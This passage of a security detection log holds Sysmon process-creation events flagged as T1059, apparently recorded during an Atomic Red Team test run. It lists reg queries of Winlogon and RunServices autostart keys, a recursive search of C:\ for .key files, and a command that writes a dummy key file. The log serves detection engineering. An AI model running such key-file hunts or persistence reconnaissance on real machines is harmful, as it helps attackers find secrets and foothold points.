<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.678107,2019-07-19T18:49:32.678107+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.660402Z"">
</TimeCreated>
<EventRecordID>3693</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.629</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-00103F573100</Data>
<Data Name=""ProcessId"">2440</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.585243,2019-07-19T18:49:32.585243+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.551678Z"">
</TimeCreated>
<EventRecordID>3691</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.541</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010B4523100</Data>
<Data Name=""ProcessId"">4016</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.497481,2019-07-19T18:49:32.497481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.463556Z"">
</TimeCreated>
<EventRecordID>3689</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.447</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010264E3100</Data>
<Data Name=""ProcessId"">1428</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.41339,2019-07-19T18:49:32.413390+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.389557Z"">
</TimeCreated>
<EventRecordID>3687</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.377</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-001097493100</Data>
<Data Name=""ProcessId"">1680</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.335446,2019-07-19T18:49:32.335446+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.304938Z"">
</TimeCreated>
<EventRecordID>3685</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.284</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-001009453100</Data>
<Data Name=""ProcessId"">5016</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.249442,2019-07-19T18:49:32.249442+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.227372Z"">
</TimeCreated>
<EventRecordID>3683</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.212</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-00107A403100</Data>
<Data Name=""ProcessId"">5984</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.180586,2019-07-19T18:49:32.180586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.150327Z"">
</TimeCreated>
<EventRecordID>3681</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.135</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010E83B3100</Data>
<Data Name=""ProcessId"">2888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.150327,2019-07-19T18:49:32.150327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:31.690830Z"">
</TimeCreated>
<EventRecordID>3680</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:31.675</Data>
<Data Name=""ProcessGuid"">747F3D96-D87B-5D31-0000-0010D92D3100</Data>
<Data Name=""ProcessId"">3188</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547737.570057,2019-07-19T18:48:57.570057+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /S /D /c&quot; dir c:\ /b /s .key &quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:57.557947Z"">
</TimeCreated>
<EventRecordID>3678</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:57.532</Data>
<Data Name=""ProcessGuid"">747F3D96-D859-5D31-0000-001045922F00</Data>
<Data Name=""ProcessId"">6220</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /S /D /c&quot; dir c:\ /b /s .key &quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D859-5D31-0000-0010FB8F2F00</Data>
<Data Name=""ParentProcessId"">888</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c:\ /b /s .key | findstr /e .key&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547737.557947,2019-07-19T18:48:57.557947+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c:\ /b /s .key | findstr /e .key&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:57.524876Z"">
</TimeCreated>
<EventRecordID>3677</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:57.502</Data>
<Data Name=""ProcessGuid"">747F3D96-D859-5D31-0000-0010FB8F2F00</Data>
<Data Name=""ProcessId"">888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c:\ /b /s .key | findstr /e .key&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547737.524876,2019-07-19T18:48:57.524876+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;echo &quot; &quot;ATOMICREDTEAM &gt; %%windir%%\cert.key&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:57.466584Z"">
</TimeCreated>
<EventRecordID>3676</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:57.433</Data>
